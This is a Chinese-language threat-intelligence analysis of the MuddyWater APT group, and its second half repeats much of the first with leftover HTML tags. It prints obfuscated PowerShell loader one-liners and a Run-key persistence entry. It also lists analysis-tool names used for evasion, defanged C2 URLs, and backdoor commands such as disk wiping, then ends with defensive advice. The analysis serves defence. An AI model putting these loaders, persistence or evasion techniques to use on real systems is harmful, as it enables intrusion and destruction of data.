MuddyWater APT组织攻击活动技术分析文档<\/h1>

一、组织概述<\/h2>

MuddyWater是一个自2017年出现的APT组织，主要攻击目标包括：<\/p>

主要目标国家：伊朗、沙特阿拉伯<\/li>
次要目标国家：约旦、土耳其、阿塞拜疆、巴基斯坦、阿富汗<\/li>

其他受影响地区：马里、奥地利、俄罗斯、巴林等<\/li> <\/ul>

攻击目标类型：<\/p>

政府组织<\/li>
军事实体<\/li>
电信公司<\/li>

教育机构<\/li> <\/ul>

二、攻击技术细节<\/h2>

1. 初始感染向量<\/h3>

攻击方式：鱼叉式钓鱼攻击<\/p>

使用启用宏的Office 97-2003文档<\/li>
宏通常密码保护以防止静态分析<\/li>

触发方式：

首次启用宏时执行<\/li>

部分样本通过激活伪造文本框触发<\/li> <\/ul> <\/li> <\/ul>

2. 宏Payload分析<\/h3>

宏执行流程：<\/p>

Base64编码的payload执行以下操作：

释放2-3个文件到ProgramData文件夹<\/li>

添加当前用户的RUN注册表项实现持久化<\/li> <\/ul> <\/li> <\/ol>

典型释放文件：<\/p>

\EventManager.dll<\/code><\/li>
\EventManager.logs<\/code><\/li>

\WindowsDefenderService.inil<\/code><\/li>
<\/ul>
注册表持久化示例：<\/p>
Name: WindowsDefenderUpdater
Type: REG_EXPAND_SZ
Data: c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1
<\/code><\/pre>
3. 执行流分析<\/h3>
Case 1: INF\/SCT\/文本文件组合<\/h4>

INF文件通过advpack.dll的LaunchINFSection函数启动<\/li>
INF通过scrobj.dll注册SCT文件<\/li>
SCT文件中的JS\/VB代码通过WMI启用PowerShell one-liner<\/li>
<\/ol>
典型PowerShell命令：<\/p>
powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while<\/span>($c -ne<\/span> $s.length){$v=($v*52)+([Int32][char]<\/span>$s[$c]-40);if<\/span>((($c+1)%<\/span>3) -eq<\/span> 0){while<\/span>($v -ne<\/span> 0){$vv=$v%<\/span>256;if<\/span>($vv -gt<\/span> 0){$d+=[char][Int32]<\/span>$vv}$v=[Int32]<\/span>($v\/256)}}$c+=1;};[array]<\/span>::Reverse($d);iex([String]<\/span>::Join(''<\/span>,$d));
<\/span><\/span><\/code><\/pre>Case 2: VBS\/文本文件组合<\/h4>

VBS文件自解码后调用mshta.exe<\/li>
传递VB脚本代码给PowerShell one-liner<\/li>
<\/ol>
典型PowerShell命令：<\/p>
powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]<\/span>::Unicode.GetString([System.Convert]<\/span>::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));
<\/span><\/span><\/code><\/pre>4. PowerShell代码功能<\/h3>
主要行为：<\/p>


关闭Office安全设置：<\/p>

禁用宏警告(Macro Warnings)<\/li>
禁用受保护视图(Protected View)<\/li>
<\/ul>
<\/li>

反分析检测：<\/p>

检查并匹配以下分析工具进程：
"win32_remote","win64_remote64","ollydbg","ProcessHacker","tcpview","autoruns","autorunsc","filemon","procmon","regmon","procexp","idaq","idaq64","ImmunityDebugger","Wireshark","dumpcap","HookExplorer","ImportREC","PETools","LordPE","dumpcap","SysInspector","proc_analyzer","sysAnalyzer","sniff_hit","windbg","joeboxcontrol","joeboxserver"
<\/code><\/pre>
<\/li>
检测到分析工具时触发重启或蓝屏(通过ntdll.dll NtRaiseHardError)<\/li>
<\/ul>
<\/li>
<\/ol>
5. C2通信机制<\/h3>


C2服务器选择：<\/p>

从硬编码URL列表中随机选择<\/li>
失败后尝试其他URL并休眠1-30秒<\/li>
<\/ul>
<\/li>

受害者注册：<\/p>

通过https:\/\/api.ipify.org\/获取公网IP<\/li>
加密发送以下信息：

公网IP<\/li>
OS版本<\/li>
内网IP<\/li>
机器名<\/li>
域名<\/li>
用户名<\/li>
<\/ul>
<\/li>
接收分配的$sysid用于后续通信<\/li>
<\/ul>
<\/li>
<\/ol>
6. 支持的命令<\/h3>



命令<\/th>
功能<\/th>
<\/tr>
<\/thead>


upload<\/td>
从C2下载文件保存到ProgramData<\/td>
<\/tr>

screenshot<\/td>
截屏保存为PNG文件<\/td>
<\/tr>

Excel<\/td>
接收PS代码通过Excel DDE执行<\/td>
<\/tr>

Outlook<\/td>
接收PS代码通过Outlook COM执行<\/td>
<\/tr>

Risk<\/td>
接收PS代码通过Explorer.exe执行<\/td>
<\/tr>

Reboot<\/td>
立即重启系统<\/td>
<\/tr>

Shutdown<\/td>
立即关闭系统<\/td>
<\/tr>

Clean<\/td>
破坏C\/D\/E\/F盘后重启<\/td>
<\/tr>
<\/tbody>
<\/table>
三、攻击者特征分析<\/h2>


文档元数据线索：<\/p>

C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd<\/code><\/li>
C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd<\/code><\/li>
C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd<\/code><\/li>
C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd<\/code><\/li>
<\/ul>
<\/li>

语言特征：<\/p>

样本中发现中文提示：
无法连接到网址,请等待龙...无法访问本地计算机寄存器任务计划程序访问被拒绝
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>

真实C2服务器（可能）：<\/p>

http:\/\/www.cankayasrc[.]com\/style\/js\/main.php<\/li>
http:\/\/ektamservis[.]com\/includes\/main.php<\/li>
http:\/\/gtme[.]ae\/font-awesome\/css\/main.php<\/li>
<\/ul>
<\/li>
<\/ol>
四、防御建议<\/h2>


针对初始感染：<\/p>

禁用Office宏执行<\/li>
启用受保护视图<\/li>
教育用户识别钓鱼邮件<\/li>
<\/ul>
<\/li>

检测指标：<\/p>

监控ProgramData目录异常文件创建<\/li>
检测RUN注册表项异常修改<\/li>
监控异常PowerShell命令执行<\/li>
<\/ul>
<\/li>

高级防御：<\/p>

部署行为分析检测反分析行为<\/li>
阻断已知C2域名\/IP<\/li>
监控对api.ipify.org的异常访问<\/li>
<\/ul>
<\/li>

应急响应：<\/p>

发现感染后立即隔离系统<\/li>
检查所有磁盘破坏情况<\/li>
重置所有凭据<\/li>
<\/ul>
<\/li>
<\/ol>

命令<\/th>	功能<\/th> <\/tr> <\/thead>
upload<\/td>	从C2下载文件保存到ProgramData<\/td> <\/tr>
screenshot<\/td>	截屏保存为PNG文件<\/td> <\/tr>
Excel<\/td>	接收PS代码通过Excel DDE执行<\/td> <\/tr>
Outlook<\/td>	接收PS代码通过Outlook COM执行<\/td> <\/tr>
Risk<\/td>	接收PS代码通过Explorer.exe执行<\/td> <\/tr>
Reboot<\/td>	立即重启系统<\/td> <\/tr>
Shutdown<\/td>	立即关闭系统<\/td> <\/tr>
Clean<\/td>	破坏C\/D\/E\/F盘后重启<\/td> <\/tr> <\/tbody> <\/table> 三、攻击者特征分析<\/h2> 文档元数据线索：<\/p> `C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd<\/code><\/li>` `C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd<\/code><\/li>` `C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd<\/code><\/li>` `C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd<\/code><\/li> <\/ul> <\/li>` 语言特征：<\/p> 样本中发现中文提示：无法连接到网址,请等待龙...无法访问本地计算机寄存器任务计划程序访问被拒绝 <\/code><\/pre> <\/li> <\/ul> <\/li> 真实C2服务器（可能）：<\/p> http:\/\/www.cankayasrc[.]com\/style\/js\/main.php<\/li> http:\/\/ektamservis[.]com\/includes\/main.php<\/li> http:\/\/gtme[.]ae\/font-awesome\/css\/main.php<\/li> <\/ul> <\/li> <\/ol> 四、防御建议<\/h2> 针对初始感染：<\/p> 禁用Office宏执行<\/li> 启用受保护视图<\/li> 教育用户识别钓鱼邮件<\/li> <\/ul> <\/li> 检测指标：<\/p> 监控ProgramData目录异常文件创建<\/li> 检测RUN注册表项异常修改<\/li> 监控异常PowerShell命令执行<\/li> <\/ul> <\/li> 高级防御：<\/p> 部署行为分析检测反分析行为<\/li> 阻断已知C2域名\/IP<\/li> 监控对api.ipify.org的异常访问<\/li> <\/ul> <\/li> 应急响应：<\/p> 发现感染后立即隔离系统<\/li> 检查所有磁盘破坏情况<\/li> 重置所有凭据<\/li> <\/ul> <\/li> <\/ol>